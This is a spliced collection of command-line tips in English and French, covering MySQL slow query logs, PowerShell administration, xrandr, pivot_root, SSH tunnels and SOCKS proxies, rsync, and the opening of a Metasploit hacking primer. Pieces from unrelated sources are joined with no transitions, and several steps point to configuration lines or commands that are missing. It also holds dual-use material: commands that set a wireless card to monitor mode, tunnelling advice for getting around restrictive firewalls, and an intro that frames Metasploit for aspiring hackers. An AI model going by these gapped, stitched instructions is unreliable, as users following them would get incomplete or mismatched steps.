grep every file recursively from the current folder wich contains the word foo but not with filename bar and replace string grep -rl foo . | grep -v bar | xargs sed -i 's/string1/string2/g'
One of the most important steps in optimizing and tuning mysql is to identify the queries that are causing problems. How can we find out what queries are taking a long time to complete? How can we see what queries are slowing down the mysql server? Mysql has the answer for us and we only need to know where to look for it… Normally from my experience if we take the most ‘expensive’ 10 queries and we optimize them properly (maybe running them more efficiently, or maybe they are just missing a simple index to perform properly), then we will immediately see the result on the overall mysql performance. Then we can iterate this process and optimize the new top 10 queries. This article shows how to identify those ‘slow’ queries that need special attention and proper optimization.
1. Activate the logging of mysql slow queries.
The first step is to make sure that the mysql server will log ‘slow’ queries and to properly configure what we are considering as a slow query.
First let’s check on the mysql server if we have slow query logging enabled:
mysqladmin var |grep log_slow_queries
| log_slow_queries | OFF |
If log_slow_queries is ON then we already have it enabled. This setting is by default disabled – meaning that if you don’t have log_slow_queries defined in the mysql server config this will be disabled. The mysql variable long_query_time (default 1) defines what is considered as a slow query. In the default case, any query that takes more than 1 second will be considered a slow query.
Ok, now for the scope of this article we will enable the mysql slow query log. In order to do to do this in your mysql server config file (/etc/my.cnf RHEL/Centos or /etc/mysql/my.cnf on Debian, etc.) in the mysqld section we will add:
This configuration will log all queries that take more than 1 sec in the file /var/log/mysql/mysql-slow.log. You will probably want to define these based on your particular setup (maybe you will want the logs in a different location and/or you will consider a higher value than 1 sec to be slow query).
Once you have done the proper configurations to enable mysql to log slow queries you will have to reload the mysql service in order to activate the changes.
2. Investigate the mysql slow queries log.
After we enabled slow query logging we can look inside the log file for each slow query that was executed by the server. Various details are logged to help us understand how was the query executed:
Time: how long it took to execute the query
Lock: how long was a lock required
Rows: how many rows were investigated by the query (this can help see quickly queries without indexes)
Host: the actual host that launched the query (this can be localhost, or a different one in multiple servers setup)
The actual mysql query.
This information allows us to see what queries need to be optimized, but on a high traffic server and with lots of slow queries this log can grow up very fast making it very difficult to find any relevant information inside it. In this case we have two choices:
We increase the long_query_time and we focus on the queries that take the most time to complete, and we gradually decrease this once we solve the queries.
We use some sort of tool to parse the slow query log file and have it show us the most used queries.
Of course based on the particular setup we might end up using both methods.
MySQL gives us a small tool that does exactly this: mysqldumpslow. This parses and summarizes the MySQL slow query log. From the manual page here are the options we can use:
-v verbose
-d debug
-s=WORD
what to sort by (t, at, l, al, r, ar etc)
-r reverse the sort order (largest last instead of first)
-t=NUMBER
just show the top n queries
-a don't abstract all numbers to N and strings to 'S'
-n=NUMBER
abstract numbers with at least n digits within names
-g=WORD
grep: only consider stmts that include this string
-h=WORD
hostname of db server for *-slow.log filename (can be wildcard)
-i=WORD
name of server instance (if using mysql.server startup script)
-l don't subtract lock time from total time
For example using:
mysqldumpslow -s c -t 10
we get the top 10 queries (-t 10) sorted by the number of occurrences in the log (-s c). Now it is time to have those queries optimized. This is outside of the scope of this article but the next logical step is to run EXPLAIN on the mysql query and then, based on the particular query to take the appropriate actions to fix it.
mysqldumpslow -s c -t 10 /var/log/mysql_slow_queries.log
NAME
mysqldumpslow – Summarize slow query log files
SYNOPSIS
mysqldumpslow [options] [log_file …]
DESCRIPTION
The MySQL slow query log contains information about queries that take a long time to execute (see Section 5.2.5, “The Slow Query Log”).
mysqldumpslow parses MySQL slow query log files and prints a summary of their contents.
Normally, mysqldumpslow groups queries that are similar except for the particular values of number and string data values. It “abstracts” these values to N and ‘S’ when displaying summary output. The -a and -n options can be used to modify value abstracting behavior.
Invoke mysqldumpslow like this:
shell> mysqldumpslow [options] [log_file ...]
mysqldumpslow supports the following options.
· –help
Display a help message and exit.
· -a
Do not abstract all numbers to N and strings to ‘S’.
· –debug, -d
Run in debug mode.
· -g pattern
Consider only queries that match the (grep-style) pattern.
· -h host_name
Host name of MySQL server for *-slow.log file name. The value can contain a wildcard. The default is * (match all).
· -i name
Name of server instance (if using mysql.server startup script).
· -l
Do not subtract lock time from total time.
· -n N
Abstract numbers with at least N digits within names.
· -r
Reverse the sort order.
· -s sort_type
How to sort the output. The value of sort_type should be chosen from the following list:
· t, at: Sort by query time or average query time
· l, al: Sort by lock time or average lock time
· r, ar: Sort by rows sent or average rows sent
· c: Sort by count
By default, mysqldumpslow sorts by average query time (equivalent to -s at).
· -t N
Display only the first N queries in the output.
· –verbose, -v
Verbose mode. Print more information about what the program does.
rfkill
list [id|type ...]
List the current state of all available devices. The command output format is
deprecated, see the section DESCRIPTION. It is a good idea to check with list
command id or type scope is appropriate before setting block or unblock. Special
all type string will match everything. Use of multiple id or type arguments is
supported.
block id|type [...]
Disable the corresponding device.
unblock id|type [...]
Enable the corresponding device. If the device is hard-blocked, for example via a
hardware switch, it will remain unavailable though it is now soft-unblocked.
iw dev
iw phy phy0 info
iw phy phy0 interface add mon0 type monitor
iw dev wlan0 del
ifconfig mon0 up
Requirements
Computer running Windows Vista (or higher)
Server running Windows Server 2008 (or higher)
PowerShell 5.0
Administrative access
1: Create a PowerShell session
Command: Enter-PSSession
Creating a PSSession will allow an administrator to remotely connect to a computer on the network and run any number of PS commands on the device. During the session, multiple commands may be executed remotely, since the admin has console access just as though he/she were sitting locally at the machine.
Figure D
Using Invoke-Command in PS renders similar results to executing a session as in command #1 above, except that when using Invoke to call forth a command remotely, only one command may be executed at a time. This prevents running multiple commands together unless they are saved as a .PS1 file and the script itself is invoked.
Sometimes installations or configurations will require a reboot to work properly. Other times, a computer just needs a refreshing of the resources, and a reboot will accomplish that. Whether targeted at one or one hundred devices, PS can ease the job with just one command for all.
The PING command is one of the most useful commands in a sysadmin's arsenal. Simply put, it tests connectivity between your current station and another remote system. Test-Connection brings it up a notch by folding that functionality into a PS cmdlet, while adding some new tricks—such as being able to designate a source computer that's different from the one you're currently logged onto. Say you need to test communications between a server and a remote device. The ICMP requests will be sent from the server to the remote device, yet report the findings back to your admin station.
Services are resilient and sometimes finicky. Depending on what's going on with a particular computer, they may halt at the worst possible time. Determining a station's running services begins with the Get-Service cmdlet to obtain current statuses. Once that information is available, the process to set a service status is possible - be it for one service, those that begin with the letter W, or all of them at once.
6: Run background tasks
Command: Start-Job
Example: Start-Job -FilePath PATH_TO_SCRIPT.PS1
Some administrators do what they need to do when they need to do it, regardless of what's going on or what the users are doing. Others prefer to work in the shadows to keep things humming along with little to no interruptions. If you're one of the latter, this cmdlet is perfect for your management style.
It executes scripts or tasks in the background no matter who is interactively logged on or what they may be doing. Further, it will execute silently—even if it were to fail—and not interrupt the locally logged on user at all. Like a ghost!
Unlike running things silently or rebooting a desktop from afar, there are times when computers need to be shut down. For these moments, this cmdlet will ensure that one or all computers are properly shut down and will even log off interactive users if the -Force argument is included.
8: Join computers to a domain
Command: Add-Computer
While the process of joining a computer to a domain is fairly straightforward, the three clicks and entering of admin credentials can become quite tedious when multiplied by several hundreds of computers at a time.
PowerShell can make short work of the task. This cmdlet allows for multiple computers at once to be joined to a domain, while requiring the admin to enter his/her credentials only once.
9: Manage other applications and services
Command: Import-Module
One of PowerShell's greatest benefits is its flexibility when it comes to managing just about anything—from Windows-based computing systems to applications like Microsoft Exchange. Some applications and system-level services permit only a certain level of management via GUI. The rest is defaulted to PS, so Microsoft is clearly leveraging the technology significantly.
This is accomplished through the use of modules that contain the necessary codebase to run any number of additional cmdlets within PowerShell that target a specific service or application. Modules may be used only when needed by importing them, at which point they will extend the PS functionality to a specific service or app. Once your work is done, you can remove the module from the active session without closing it altogether.
Depending on several factors, including the deployment system used, scripting experience level and security, and company policy, computers being renamed might not be done regularly (or perhaps it's a task performed quite often). Either way, the Rename cmdlet is extremely useful when working on one or multiple systems—workgroup or on a domain.
The cmdlet will rename a device and reboot it so that the changes can take effect. For those on a domain, the added benefit will be that if the Active Directory Schema supports it, the new computer will also result in a computer object rename within AD. The object will retain all its settings and domain joined status but will reflect the new name without any significant downtime to the user outside of a reboot
Switch Radeon GPU: Restart GPUs and switch Polaris Compute Mode, Vega HBCC Memory and Large Pages
Updated on June 6th, 2018 to version 0.9.5
Switch Radeon GPU is a simple command line tool for restarting Radeon based GPUs. It can switch Polaris based GPUs (RX 470/480/570/580) from ‘Graphics Mode’ into ‘Compute Mode’. It also can toggle low level options of Radeon Vega GPUs like HBCC Memory and Large Pages support.
Switch Radeon GPU was developed as part of Cast XMR CryptoNight Miner but could be useful for handling Radeon GPUs for all sorts of workloads in OpenCL compute mode.
Make restarting your Radeon based GPU a breeze:
Switch Radeon GPU 0.9.5 for Windows (64 bit)
Features
Restarts Radeon GPUs
Switch ‘Compute Mode’ on or off (only RX 470/RX 480/RX 570/RX 580)
Switch ‘HBCC Memory’ on or off (only Vega GPUs)
Switch ‘Large Pages’ on or off (only Vega GPUs)
Requirements
Windows 8/8.1/10 64 bit
AMD Radeon RX Vega 56/64 GPU
or AMD Radeon Vega Frontier Edition GPU
or AMD Radeon RX 480/RX 580 GPU
or AMD Radeon RX 470/RX 570 GPU
Radeon Driver 17.1.1 or later for restarting GPUs
Radeon Driver 18.1.1 or later for switching modes
How To
switch-radeon-gpu has a command line interface:
Executing switch-radeon-gpu without any arguments will list all installed Radeon GPUs and their status.
To select which GPU to operate on use the -G switch, e.g. for restarting the 2nd card use:
switch-radeon-gpu -G 1 restart
To select multiple GPUs use the -G switch and list comma separated the GPUs which should be used, e.g. for restarting the 1st and 3rd card use:
switch-radeon-gpu -G 0,2 restart
There are different restart modes:
restart fast restart the specified GPU, the AMD Radeon Settings will sometimes not pick up the configuration changes and display the old state
autorestart only restart the GPU if necessary due to a change in configuration
fullrestart a more sustained restart of the GPU, also the AMD Radeon Settings app wil restart
If no GPU is specified with the -G option all available GPUs will be restarted!
Following options of the GPU can be switched:
--compute =on switch the GPU based in ‘Compute Mode’ =off switch to ‘Graphics Mode’ (Polaris only)
--hbcc switch HBCC =on or =off (Vega only)
--largepages switch large page support =on or =off (Vega only). Most usefull for Vega Frontier Edition to better utilize the available 16 GB memory
For example switch all Polaris based GPUs to Compute Mode:
switch-radeon-gpu --compute=on autorestart
To turn HBCC Memory option for all Vega based GPUs to off:
The default resolution in most XenCenter VMs are crap. Trying to work with 800x600 resolution is like looking through a submarine porthole. Let's increase the resolution of the VM:
Set the line to the following. You can change the resolutions below to suit your preferred order. The first entry will be used on default. Don't forget you can set it pretty high and then just click the "scale" option in the console window of XenCenter.
Starts the VM Guest graphical output on VNC display number 5 (usually port 5905). The password suboption initializes a simple password-based authentication method. There is no password set by default and you have to set one with the change vnc password command in QEMU monitor:
QEMU 0.12.5 monitor - type 'help' for more information
(qemu) change vnc password
Password: ****
If this fails, I will need to know how it fails, but it denotes some problem I am not aware of. It should work with any standard (VESA) resolution - no, 1366x768 is not a VESA standard and may fail. 1024x768 is a good one to try, as are 1280x1024, 1900x1200, 1920x1080, and many others. 1360x768 is compliant with the standard as well.
If it worked, now type xrandr without any arguments and you'll get a list of available displays. It may list multiple displays - you want to select one that says connected , such as
VGA1 connected 1600x900+1280+0 (normal left inverted right x axis y axis) 443mm x 249mm
Yours may be labeled differently, and will probably read 640x480 instead.
Take the first word (in my case VGA1) and copy it. Now type 'xrandr --addmode "output name" "the part in quotes from the modeline you calculated earlier, with quotes removed" '
such as:
xrandr --addmode VGA1 1024x768_60.00
If this succeeds, you can set the display mode from the UI (probably), or if that fails by typing
xrandr --output VGA1 --mode 1024x768_60.00
(substituting your values, of course)
To make these survive reboot you can either run the xrandr stuff at startup (make sure it returns zero if you put it in for example your display manager setup scripts, otherwise things changing between boots could cause your DM to hang or constantly restart!), or you can put something in xorg.conf or xorg.conf.d:
Section "Device"
Identifier "Configured Video Device"
Driver "vesa"
EndSection
$client = new-object System.Net.WebClient
$client.DownloadFile("http://www.xyz.net/file.txt","C:\tmp\file.txt")
It works as well with GET queries.
If you need to specify credentials to download the file, add the following line in between:
$client.Credentials = Get-Credential
$computer = gc env:computername
$key = "XXXXX-XXXXX-XXXXX-XXXXX-XXXXX"
$service = get-wmiObject -query "select * from SoftwareLicensingService" -computername $computer
$service.InstallProductKey($key)
$service.RefreshLicenseStatus()
Use the SC (service control) command, it gives you a lot more options than just start & stop.
DESCRIPTION:
SC is a command line program used for communicating with the
NT Service Controller and services.
USAGE:
sc [command] [service name] ...
The option has the form "\\ServerName"
Further help on commands can be obtained by typing: "sc [command]"
Commands:
query-----------Queries the status for a service, or
enumerates the status for types of services.
queryex---------Queries the extended status for a service, or
enumerates the status for types of services.
start-----------Starts a service.
pause-----------Sends a PAUSE control request to a service.
interrogate-----Sends an INTERROGATE control request to a service.
continue--------Sends a CONTINUE control request to a service.
stop------------Sends a STOP request to a service.
config----------Changes the configuration of a service (persistant).
description-----Changes the description of a service.
failure---------Changes the actions taken by a service upon failure.
qc--------------Queries the configuration information for a service.
qdescription----Queries the description for a service.
qfailure--------Queries the actions taken by a service upon failure.
delete----------Deletes a service (from the registry).
create----------Creates a service. (adds it to the registry).
control---------Sends a control to a service.
sdshow----------Displays a service's security descriptor.
sdset-----------Sets a service's security descriptor.
GetDisplayName--Gets the DisplayName for a service.
GetKeyName------Gets the ServiceKeyName for a service.
EnumDepend------Enumerates Service Dependencies.
The following commands don't require a service name:
sc
Vous avez jamais voulu démonter la partition racine de votre ptit nunux ? Non ? Pourquoi faire ?! Bhaa je sais pas moi, par exemple faire des opérations sur votre partition racine (redimensionner/changer le filesystem/réparer le fs). Sauf que bon en temps normal vous ne pouvez pas démonter la partition racine puisque votre OS est sur cette partition.
Par chance, nous vivons dans une époque merveilleuse où l’on possède tous pas mal de Giga de ram ce qui rend l’opération possible et même assez simple. Allez on y va !
Couper tout ce qui tourne
Pour pouvoir démonter votre partoche il va falloir couper tous les processus faisant des accès disques (lsof va être votre ami). Cette étape peut être faite au tout dernier moment avant le grand saut pour impacter le moins possible l’uptime de vos services.
Si vous avez suffisamment de ram vous pouvez même vous débrouiller pour ne pas couper ou juste relancer les processes mais c’est un poil plus touchy. Surtout si vous avez des données qui sont susceptibles d’être modifiées pendant que ça tourne.
Recréer son userland en ram
Bon donc le but du jeu ça va être de se créer une partition racine mais dans la ram. Donc déjà première étape, on se créer un point de montage mkdir /ramroot et ensuite on y monte du tmpfs avec mount -t tmpfs none /ramroot .
Là ça y est, tout ce que vous collerez dans /ramroot ne sera pas sur votre skeudur mais dans votre ram.
Là, deux choix s’offrent à nous : votre partition racine peut être contenue dans votre ram (c’est le plus simple) ou bien vous n’avez pas assez de ram et du coup va falloir recréer de 0 ( j’aborderai pas ce point mais en gros soit vous ne prenez que le strict nécessaire de votre rootfs, soit vous n’avez qu’à pécho un rootfs sur les interwebz ).
Bon donc cp -ax /{bin,etc,sbin,lib32,lib64,lib} /ramroot puis pour s’économiser de la ram mkdir /ramroot/usr suivi de cp -ax /usr/{bin,sbin,lib32,lib64} /ramroot/usr . Voilà on a tout l’userspace !
Tout ? Non. Il manque plus que les montages “bizarres”.
Bon bah mkdir /ramroot/dev /ramroot/sys /ramroot/proc pour créer les points de montage. Par contre là vu que ça existe déjà sur votre disque dur, on va juste “binder” avec mount –rbind /dev /ramroot/dev puis mount –rbind /proc /ramroot/proc et mount -t proc none /ramroot/proc et là c’est tout bon.
Le grand saut
Bon bah vous avez un bien bel userspace de dispo dans votre ramdisk. On peut donc se décider à migrer dedans.
Premièrement mkdir /ramroot/oldroot va accueillir notre skeudur. Et maintenant la commande miraculeuse.
pivot_root /ramroot /ramroot/oldroot
Et là votre racine est désormais votre ramdisk. Maintenant vous pouvez umount /dev/sda2 et admirer votre dur boulot.
Vous pouvez faire ce que vous vouliez faire désormais. C’est beau, hein ? Au final c’est diablement simple et super efficace.
Revenir
Vous voulez revenir sans rebooter ? Easy vous n’avez qu’à mount /dev/sda2 /oldroot et enfin pivot_root /oldroot /oldroot/ramroot et pouf vous voilà hors de votre ramdisk de retour sur votre partoche.
Auteur : lord
https://lord.re/posts/58-pivot_root-unmount-son-root/
Ça vous arrive combien de fois de plus savoir si vous êtes sur une session ssh distante ou si vous êtes sur un terminal local ? Pour moi ça m’arrive constamment. Enfin ça m’arrivait. J’ai trouvé une petite astuce qui change tout : Changer le background d’un terminal à la volée !
Et ouai il existe un séquence d’échappement qui permet de faire ce petit miracle à condition que votre terminal le gère (par exemple xterm et très bientôt alacritty). La séquence magique est \033]11;#rrggbb\007 . Voilà voilà.
Comment utiliser ça ? Easy ! Vous éditez votre /etc/ssh/ssh_config et vous mettez
PermitLocalCommand yes
LocalCommand /bin/echo -e "\033]11;#440044\007"
et là bam : à la prochaine connexion ssh un magnifique fond violet vous sautera à la gueule. Toute fois, cela empêchera le scp, méfiance. Par contre comment remettre le fond comme il faut au retour ? Là il faut ruser un poil, on vera après. Vous pouvez également faire en sorte de mettre une couleur différente par destination ssh, soit du côté client en modifiant votre ~/.ssh/config mais du coup c’est un poil chiant car local, soit en modifiant le script d’initialisation du shell distant. Perso je rajoute le fameux echo dans le /etc/zsh/zshrc avec des couleurs différentes. Comme ça, quelque soit la machine d’origine ça fonctionne.
Bon pour récup la couleur d’origine faut feinter. Dans mon cas j’utilise zsh. Dans ce zsh j’ai rajouté un ptit truc sympa qui permet de chronométrer toutes les commandes que je lance et d’afficher la durée dans le prompt. Pour se faire, j’ai un fichier /etc/zsh/prompt.zsh avec dedans deux fonctions : une preexec() qui définie une variable timer. Et la precmd() qui récupère la variable timer, calcule les secondes écoulées et affiche le résultat dans le RPROMPT. Jusque là rien d’éxotique. Il suffit donc de rajouter le /bin/echo dans la precmd() et le tour est joué. Cette commande étant executée à la fin de chaque commande, en sortant d’une session ssh, vous retrouverez la couleur souhaitée.
C’est presque aussi efficace qu’un mollyguard pour le moment. Par contre à voir si je ne m’y accoutumerais pas trop.
Auteur : lord
https://lord.re/posts/49-changer-couleur-fond-terminal
Parceque c’est le plus drôle de tous, il a le droit à une petite place ici : Cancer. Ouaip Cancer terminal. C’est fin et joyeux. Il est en rust et plutôt simple. Il gère sixel c’est assez marrant mais franchement gadget. Je l’ai pas testé plus que ça.
Un de mes chouchoux est st. C’est un term très simple. Pas de fichier de conf. Si on veux modifier un règlage il faut le faire dans le config.h et recompiler. Et au final ce fichier est suffisamment bien foutu et la compilation est tellement rapide que c’est pas vraiment plus long que d’éditer un fichier de conf habituel. Je l’ai très longtemps utilisé. C’est fait par les braves gars de chez Suckless qui ont à cœur de développer des outils le moins bloatés possibles avec très peu de lignes de codes. Il est rapide et gère même le truecolor. Par contre pas de scrollback, ça peut gêner au début mais on s’y fait très bien. Je l’ai gardé quelques années sans soucis.
Mais j’ai découvert un ptit nouveau, le surprenant Alacritty. Il est simple, pas de GUI, un ptit fichier de conf bien commenté, peu de features à la noix et un peu plus gourmand que St. Codé en rust, sa particularité est d’être le plus rapide. Et bha… c’est vrai qu’il est rapide le con ! Tout l’affichage est en fait en OpenGl. Mais du coup lui faire bouffer des dizaines de lignes devient instantanné. On peut même refaire mumuse avec la libcaca en “Haute résolution” (ouai en choisissant une font toute petite pour avoir des pixels assez petits et c’est plutôt fluide). Il est très jeune et du coup encore un peu brut de décoffrage (des ptits soucis graphiques dans de très rares cas) mais du coup il est possible d’influencer un peu son developpement. Une petite communauté s’est déjà formée. Je pense qu’il a pas mal d’avenir. Bref c’est mon nouveau jouet du moment.
Auteur: lord
https://lord.re/posts/48-emulateurs-terminaux/
Quelques tips pour bien utiliser la commande patch.
La commande diff
Cette commande permet de trouver les differences entre 2 fichiers. Elle vous retourne la ligne du fichier original et la ligne modifiée. Elle va nous permettre de créer le patch que nous pourrons ensuite appliquer. Il existe plusieurs types de patch. Celui qui est le plus répandu est le patch unifié car il apporte de la souplesse dans son application en permettant une certaine variation du fichier à patcher.
La commande patch
La commande patch va prendre en entré le resultat de la commande diff et va appliquer les changements sur le fichier désigné. Le fait d’avoir dans le patch la version originale et la version modifiée permet d’éviter de patcher un fichier qui n’est pas le bon, ou même de patcher un fichier déjà à jour.
Exemple :
diff -aburN --exclude=CVS* repertoire/reference/ repertoire/modifie/ > patch.diff
Cette commande crée un patch unifié. Interêt des options passées :
-a : traiter tout les fichiers comme du texte
-b : permet de ne pas tenir compte des différences sur les espaces
-u : faire un patch unifié
-r : parcourrir les sous répertoires
-N : permet de gérer les fichiers nouveaux
—exclude=CVS : permet d’exclure des fichiers ou répertoire de l’analyse.
Le patch ainsi fabriqué contient des éléments qui vont permettre à la commande patch de retrouver les fichiers à modifier à travers l’arborescense, puis de trouver les bonnes lignes, même si celles-ci ont légèrement été déplacées.
patch -p 1 < patch.diff
L’option -p N permet d’adapter l’aborescence d’origine du patch à l’arborescence que l’on est en train de traiter.
Pour toutes les manipulations qui suivent, il faut être connecté en tant qu’utilisateur postgres :
%> su - postgres
Dumper une base
La commande pg_dump permet d’afficher la structure d’une base nom_de_la_base ainsi que ses données sur la sortie standard.
En utilisant une redirection de la sortie standard vers un fichier, on réalise donc une copie de la base.
%> pg_dump -D {nom_de_la_base} > {nom_du_fichier.dump}
Recréer une base à partir d’un dump
S’il y a besoin de restaurer une base, ou d’en construire une nouvelle à partir d’une base existante, il faut utiliser un fichier de dump.
Dans un premier temps, effacer la base existante si besoin :
%> dropdb {nom_de_la_base}
Dans un deuxième temps, recréer ou créer la base :
%> createdb {nom_de_la_base}
Dans un troisième temps, importer dans la base le fichier de dump :
%> psql -e {nom_de_la_base} < {nom_du_fichier.dump}
Pour importer le dump, on peut aussi le faire en étant connecté à la base (utile lorsque le postmaster demande une authentification par mot de passe [1]) en utilisant la commande psql :
nom_de_la_base=# \i {nom_du_fichier.dump}
Ainsi la base est créée et initialisée avec la structure et les données déclarées dans le fichier de dump. Celui-ci étant en mode texte il est trés facile de le modifier avec un éditeur.
PS : Dans tous les cas, pour que cela fonctionne, il faut que le serveur de base de donnés PostgreSQL fonctionne sur la machine. C’est une erreur courante que d’oublier de le démarrer.
[1] car dans ce cas là, on ne peut pas faire la redirection de l’entrée standart
Le but de ce document est d’expliquer les tunnels SSH. C’est à dire comment utiliser SSH pour faire passer différents protocoles, ce qui permet de sécuriser la communication (une sorte de VPN software). Si vous souhaitez plus de détails sur les différentes possibilités, cet article de Buddhika Chamith vous éclairera : SSH Tunneling Explained.
Quand on se connecte à Internet depuis un lieu public et si ce lieu de connexion ne permet pas d’accéder à des ports particuliers d’un serveur (règles de firewall restrictives), il est possible d’utiliser un serveur intermédiaire sur lequel on a un compte utilisateur et qui fait tourner un serveur ssh. C’est ce serveur qui se connectera au serveur désiré. Cette solution va aussi permettre de chiffrer la communication entre le point d’accès et le serveur intermédiaire.
Pour réaliser cela, on va utiliser un tunnel SSH. Il faut donc que l’on ai accès au port 22 du serveur intermédiaire, mais dans 90% des cas les firewalls laissent sortir le trafic sur ce port.
Le principe
Il faut créer une connexion ssh entre le pc client et le serveur intermédiaire. Cette connexion (le tunnel donc) connectera un port du pc client au serveur intermédiaire. Celui-ci va lire tout ce qu’il reçoit depuis cette connexion et re-expédier le tout vers le serveur destinataire.
attention : sous Linux, on ne peut pas connecter le tunnel sur un port local privilégié si on n’est pas root. Il faut donc prendre un port au dessus de 2000.
Exemple
Je veux lire mes mails par un accés imap. Mon serveur imap est imap.mail.com et je l’interroge sur le port 143 (le porte par défaut IMAP). Mais le firewall ne laisse pas sortir les connexions vers le port 143.
Je vais donc établir un tunnel SSH entre le pc que j’utilise et un serveur sur lequel j’ai un accés ssh. Ce serveur s’appelle monserveurssh.com et j’ai un compte utilisateur de login moncompte. Je vais connecter le tunnel sur le port 2000 de mon pc client, comme suit :
Cette commande ne me connecte pas sur le serveur intermédiaire, mais me rend la main de suite grâce a l’option -f combinée avec l’option -N. L’option -2 c’est pour demander à ssh d’utiliser le protocole v2 et l’option -C c’est pour demander de compresser le tunnel.
Il ne me reste plus qu’à brancher mon client mail sur le port 2000 de localhost, et je pourrai lire mes mails, comme si j’étais connecté directement au serveur de mails.
Un détail sécurité
Quand je créé des comptes utilisateurs sur mon serveur juste pour permettre du port forwarding je ne donne pas le droit de connexion au serveur. Pour cela, dans le fichier /etc/passwd je remplace le shell du compte par /sbin/nologin. Ainsi la personne qui a ce compte peut créer des tunnels SSH mais elle ne peut pas se connecter au serveur.
Sous Windows
En utilisant Cygwin et le client ssh fourni avec, cela fonctionne très bien. Putty permet aussi d’établir des tunnels pour ceux qui sont réfractaires à la ligne de commande.
Quelques liens sur le sujet
Remote Desktop and SSH tunneling,
X over SSH2,
Documentation sur Putty en francais avec une section sur le transfert de ports
Faire un backup avec rsync
On peut utiliser ssh pour faire un backup d’une machine distante (pratique pour conserver une copie d’un site web, en ne téléchargeant que ce qui a changé depuis le dernier backup) avec rsync
rsync -v -u -a --rsh=ssh --stats user@serveur.net:/chemin/dossier/distant/a/sauver /chemin/dossier/local
Pour cela, rien de plus simple, tu prends ta ligne de commande et tu tapes :
~$ ssh -fC -D 8080 tunnel@example.org
Avec cette commande tu tu connectes en tant qu’utilisateur ‘tunnel‘ sur la machine ‘example.org‘ et le tunnel est accessible en local sur le port 8080. Pour vérifier que le tunnel soit bien là :
~$ netstat -apnt
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
[…]
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN 4464/ssh
[…]
Nous sommes content, il y a bien SSH sur le port 8080.
Vérifier notre IP
Avant d’utiliser le proxy, nous allons vérifier notre adresse IP publique. Car une fois que le navigateur sera configuré pour utiliser le proxy, elle devra être différente et correspondre à l’adresse IP du serveur SSH utilisé.
Il existe une foule de service pour découvrir son adresse IP : ipso.me.
Configurer Firefox pour utiliser le proxy SOCKS
Dans Firefox, ouvrir le menu “Edit > Preferences” et dans la fenêtre de dialogue choisir l’onglet “Advanced” puis “Network” et finalement le bouton “Settings” :
Firefox Preferences
Choisir l’option “Manual proxy configuration”, cela active toute une série de champs de saisies. Dans le champ “SOCKS Host” y mettre “127.0.0.1”, notre adresse de loopback (à adapter selon configuration) et dans le champ “Port” y mettre “8080” qui est le port d’écoute du tunnel. Ensuite bien s’assurer que “SOCKS v5” est sélectionné, ainsi :
Connection Settings
Tu penses en avoir fini, mais non, il manque le dernier détail qui tue : proxifier les requêtes DNS. En effet, sur Firefox elles ne passent pas par défaut via le proxy SOCKS. Il parait que d’autres navigateurs le font. Mais pour Firefox, il faut lui forcer la main. Pour cela, ouvrir (1) “about:config” (saisir “about:config” dans la barre d’adresse) puis rechercher (2) l’entrée “network.proxy.socks_remote_dns” qui est à “false” par défaut. Double cliquer (3) sur la ligne correspondante pour passer la valeur à “true” :
about:config - Mozilla Firefox
Vérifier
Tu retournes sur ton site préféré pour découvrir ton adresse IP et voilà :
IPso.me découvre mon adresse IP - Après proxy
Tout est pour le mieux dans le meilleur des mondes.
Note : Il n’y a pas que Firefox dans la vie. Pour lancer Chromium en mode incognito et pour qu’il utilise le proxy SOCKS sans fuite DNS, d’après cette page du site chromium.org il faut faire ainsi :
rsync options source destination
-v : verbose
-r : copies data recursively (but don’t preserve timestamps and permission while transferring data
-a : archive mode, archive mode allows copying files recursively and it also preserves symbolic links, file permissions, user & group ownerships and timestamps
-z : compress file data
-h : human-readable, output numbers in a human-readable format
-e : specify a protocol
--progress
These two options allows us to include and exclude files by specifying parameters with these option helps us to specify those files or directories which you want to include in your sync and exclude files and folders with you don’t want to be transferred.
Split Terminal Horizontally – Ctrl+Shift+0
Split Terminal Vertically – Ctrl+Shift+E
Move Parent Dragbar Right – Ctrl+Shift+Right_Arrow_key
Move Parent Dragbar Left – Ctrl+Shift+Left_Arrow_key
Move Parent Dragbar Up – Ctrl+Shift+Up_Arrow_key
Move Parent Dragbar Down – Ctrl+Shift+Down_Arrow_key
Hide/Show Scrollbar – Ctrl+Shift+s
Search for a Keyword – Ctrl+Shift+f
Move to Next Terminal – Ctrl+Shift+N or Ctrl+Tab
Move to the Above Terminal – Alt+Up_Arrow_Key
Move to the Below Terminal – Alt+Down_Arrow_Key
Move to the Left Terminal – Alt+Left_Arrow_Key
Move to the Right Terminal – Alt+Right_Arrow_Key
Copy a text to clipboard – Ctrl+Shift+c
Paste a text from Clipboard – Ctrl+Shift+v
Close the Current Terminal – Ctrl+Shift+w
Quit the Terminator – Ctrl+Shift+q
Toggle Between Terminals – Ctrl+Shift+x
Open New Tab – Ctrl+Shift+t
Move to Next Tab – Ctrl+page_Down
Move to Previous Tab – Ctrl+Page_up
Increase Font size – Ctrl+(+)
Decrease Font Size – Ctrl+()
Reset Font Size to Original – Ctrl+0
Toggle Full Screen Mode – F11
Reset Terminal – Ctrl+Shift+R
Reset Terminal and Clear Window – Ctrl+Shift+G
Remove all the terminal grouping – Super+Shift+t
Group all Terminal into one – Super+g
Metasploit was developed by HD Moore as an open source project in 2003. Originally written in Perl, Metasploit was completely rewritten in Ruby in 2007. In 2009, it was purchased by Rapid7, an IT security company that also produces the vulnerability scanner Nexpose.
Metasploit is now in version 4.9.3, which is included in our Kali Linux. It's also built into BackTrack. For those of you using some other version of Linux or Unix (including Mac OS), you can download Metasploit from Rapid7's website.
For those of you using Windows, you can also grab it from Rapid7, but I do not recommend running Metasploit in Windows. Although you can download and install it, some of the capabilities of this hacking framework do not translate over to the Windows operating system, and many of my hacks here on Null Byte will not work on the Windows platform.
Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)
Metasploit now has multiple products, including Metasploit Pro (the full commercial version) and the Community edition that is built into Kali and remains free. We will focus all of our efforts on the Community edition, as I am well aware that most of you will not be buying the $30,000 Pro edition.
Ways to Use Metasploit
Metasploit can be accessed or used in multiple ways. The most common method, and the one I use, is the interactive Metasploit console. This is the one that is activated by typing msfconsole at the command line in Kali. There are several other methods as well.
Msfcli
